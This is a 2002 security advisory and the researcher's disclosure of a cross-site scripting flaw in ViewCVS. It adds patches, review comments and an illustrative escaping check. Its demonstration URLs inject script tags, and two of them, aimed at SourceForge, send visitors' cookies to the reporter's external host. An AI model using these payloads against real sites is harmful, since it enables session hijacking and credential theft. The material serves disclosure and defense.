Category:   Application (Generic)  >   ViewCVS
Vendors:   Viewcvs.sourceforge.net
ViewCVS Web-based CVS Interface Allows Cross-Site Scripting Attacks Against ViewCVS Users
SecurityTracker Alert ID:  1004328
SecurityTracker URL:  http://securitytracker.com/id/1004328
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 20 2002
Impact:   Disclosure of authentication information, Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 0.9.2 and prior versions
Description:   A vulnerability was reported in the ViewCVS web-based CVS interface software. A remote user can conduct cross-site scripting attacks against ViewCVS users to steal their authentication cookies.

The software will display user-supplied HTML without filtering script tags. A remote user can create an HTML link that, when loaded by the target (victim) user, will cause arbitrary scripting code to be executed on the target user's browser. The code will appear to originate from the site running ViewCVS and will run in the security context of that site. As a result, the code will be able to steal the target user's authentication cookies associated with the site running ViewCVS. The code may be able to take actions on the ViewCVS site acting as the target user.

Some demonstration exploit URLs are provided:

http://target_site/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("hello")</script>
http://target_site/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("hello")</script>

The vendor has reportedly been notified.
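The reflection the description above refers to, as an added example that is not part of the advisory or of ViewCVS: a constructed template models the two contexts the demonstration URLs hit (page text for cvsroot, a double-quoted attribute for sortby), and an HTMLParser-based check shows which escaping strategy keeps the browser from seeing extra tags or a truncated attribute. The template, the function names and the check are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the two reflection points the demo URLs target (cvsroot
# echoed as page text, sortby inside a double-quoted href); not ViewCVS's own code.
TEMPLATE = '<p>CVS root: %s</p><a href="?sortby=%s">sort</a>'
# The two demonstration URLs quoted in the advisory.
DEMO_URLS = (
    'http://target_site/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("hello")</script>',
    'http://target_site/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("hello")</script>',
)

def parse_query(url):
    """First value per parameter, like the parse loop in viewcvs.py."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}

def render(params, escape):  # fill TEMPLATE after passing each value through `escape`
    return TEMPLATE % (escape(params.get("cvsroot", "")),
                       escape(params.get("sortby", "rev")))

def render_vulnerable(params):   # 0.9.2 behaviour: values reflected verbatim
    return render(params, lambda s: s)
def render_cgi_escape(params):   # cgi.escape() default: only & < > encoded
    return render(params, lambda s: html.escape(s, quote=False))
def render_hardened(params):     # quotes encoded too (html.escape quote=True)
    return render(params, html.escape)

class _TagSink(HTMLParser):
    """Records what a browser's parser would see: start tags and href values."""
    def __init__(self):
        super().__init__()
        self.tags, self.hrefs = [], []
    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.hrefs += [v for k, v in attrs if k == "href"]

def reflection_is_contained(rendered, params):
    """True iff only the template's <p> and <a> survive parsing and the href
    still carries the whole sortby value (no quote ended the attribute)."""
    sink = _TagSink()
    sink.feed(rendered)
    return (sink.tags == ["p", "a"]
            and sink.hrefs == ["?sortby=" + params.get("sortby", "rev")])

def check_demo_urls():
    """Map each render strategy to whether it contains both demo URLs."""
    params = [parse_query(u) for u in DEMO_URLS]
    return {f.__name__: all(reflection_is_contained(f(p), p) for p in params)
            for f in (render_vulnerable, render_cgi_escape, render_hardened)}
```

With the page's two URLs only the variant that also encodes quotes passes in both contexts; encoding & < > alone, as cgi.escape() does by default, still lets the quote in the sortby value end the href attribute.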

Impact:   A remote user can create HTML links that, when loaded, will cause arbitrary scripting code to be executed on the target user's browser. The code can steal the target user's authentication cookies associated with the ViewCVS site.
Solution:   No solution was available at the time of this entry.
Vendor URL:  viewcvs.sourceforge.net
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  cross-site scripting bug of ViewCVS


ViewCVS: cross-site scripting bug

I found the following cross-site scripting vulnerability in ViewCVS:


Details
------------
Product: ViewCVS
Affected Version: 0.9.2 and earlier
Vendor's URL: http://viewcvs.sourceforge.net/
Vendor Status: Informed. They have already fixed it, but only within their team;
               nothing has been published.


Introduction
------------
ViewCVS is a WWW interface for CVS repositories. It is widely used in the
free software and open source communities. Unfortunately, it has a
cross-site scripting vulnerability.


Proof
-----------------
If you access a URL like:

http://target_site/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("hello")</script>
http://target_site/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("hello")</script>

The former URL works on Internet Explorer 6.0 and Opera 6.01, but not on
Netscape 4.78, Netscape 6.2.2 or Mozilla 0.9.9 on Windows XP.
All these URLs do is make a popup window appear.


Example
-----------------
For example, you can see the vulnerability at SourceForge.net
 (the vendor's site is on SourceForge.net).

If you access the sample URL below, your cookie (including your login
information and session information about SourceForge.net) is stolen by
my site (http://www.office.ac).

The stolen cookie information from Internet Explorer 6.0 includes your
login information and session information about SourceForge.net.
But the stolen cookie information from Opera 6.01 and Mozilla 0.9.9
includes only the user name, and the cookie information from Netscape 4.78
and 6.2.2 is empty. (I don't know why.)

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script>
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev"><script>alert("ALERT:%20Now,%20your%20cookie%20about%20sourceforge.net%20is%20stolen%20by%20www.office.ac");window.open('http://www.office.ac/j.cgi?'%2Bdocument.cookie);</script>

The ViewCVS at SourceForge.net is not the newest version.
You can see the vulnerability in the newest version of ViewCVS at GNU.

http://subversions.gnu.org/cgi-bin/viewcvs/?cvsroot=<script>alert("hello")</script>
http://subversions.gnu.org/cgi-bin/viewcvs/cvs-utils/CVSROOT/?sortby=rev"><script>alert("hello")</script>


Vendor status
--------------
The vendor was notified on 13 Mar 2002 and 26 Mar 2002.

And I heard the following:
Some Japanese hackers (contributors belonging to SourceForge.jp and
Hyper NIKKI System Project) proposed a patch to the ViewCVS team
in April, but the ViewCVS team rejected it. The ViewCVS team said they
had fixed it on April 1st.
But nothing has been published by the ViewCVS team since then.


Patch
--------------
Two patches are given here. I got these patches by a non-safe method,
so I am not sure that their code is exactly the same as the original.
And I cannot understand code or programming at all,
so I take no responsibility for these patches.

One was made by Kenji Suzuki <kenji@po.ganseki.ne.jp> / Hyper
NIKKI System Project (http://www.h14m.org/).
I heard it has been applied to the web pages of Hyper
NIKKI System Project and Sourceforge.jp.

--- viewcvs.py.orig	Fri Dec 14 23:14:39 2001
+++ viewcvs.py	Sun Mar 31 15:24:34 2002
@@ -172,7 +172,7 @@
     # parse the query params into a dictionary (and use defaults)
     query_dict = default_settings.copy()
     for name, values in cgi.parse().items():
-      query_dict[name] = values[0]
+      query_dict[name] = cgi.escape(values[0])
 
     # set up query strings, prefixed by question marks and ampersands
     query = sticky_query(query_dict)
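Review bot: `cgi.escape(values[0])` is called without its second argument, so double quotes pass through unchanged; the second demonstration URL in this report shows a value reflected inside a double-quoted attribute, where an unescaped quote still terminates the attribute even though the angle brackets are now encoded. Use `cgi.escape(values[0], 1)` here at minimum, and preferably keep `query_dict` raw and escape at each point where a value is written into HTML, because the escaped values are also handed to `sticky_query(query_dict)` and to whatever non-HTML uses the parameters have.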



I heard another patch was made by the ViewCVS team. I got this code
from Taku YASUI <tach@sourceforge.jp> / Sourceforge.jp
(http://sourceforge.jp/), who had proposed the former patch to the
ViewCVS team.


===================================================================
RCS file: /cvsroot/viewcvs/viewcvs/lib/viewcvs.py,v
retrieving revision 1.107
retrieving revision 1.108
diff -u -r1.107 -r1.108
--- viewcvs/viewcvs/lib/viewcvs.py	2002/02/22 09:20:46	1.107
+++ viewcvs/viewcvs/lib/viewcvs.py	2002/04/01 01:32:16	1.108
@@ -180,8 +180,14 @@
 
     # parse the query params into a dictionary (and use defaults)
     query_dict = default_settings.copy()
+
+    # RE that ViewCVS doesn't use in any URL, but a CSS attack might
+    re_url_validate = re.compile('\'|"|<|>')
     for name, values in cgi.parse().items():
-      query_dict[name] = values[0]
+      # do not accept values that contain non-ViewCVS characters
+      # except for search
+      if not re.search(re_url_validate, values[0]) or name == 'search':
+        query_dict[name] = values[0]
 
     # set up query strings, prefixed by question marks and ampersands
     query = sticky_query(query_dict)
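Review bot: the `re_url_validate` check is a character deny-list applied at parse time rather than escaping applied where values are written into the page, and the `name == 'search'` exemption lets all four characters straight through for that parameter, so any place the search value is reflected remains exposed unless it is escaped at the point of output. A rejected value is silently dropped, leaving the entry from `default_settings` in place; that is reasonable, but the comment should say so. Minor: `re.search(re_url_validate, values[0])` works on a compiled pattern, but `re_url_validate.search(values[0])` is the idiomatic call, and the hunk relies on `re` already being imported in this module.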


--
office
office@ukky.net
office@office.ac
http://www.office.ac/

 
 

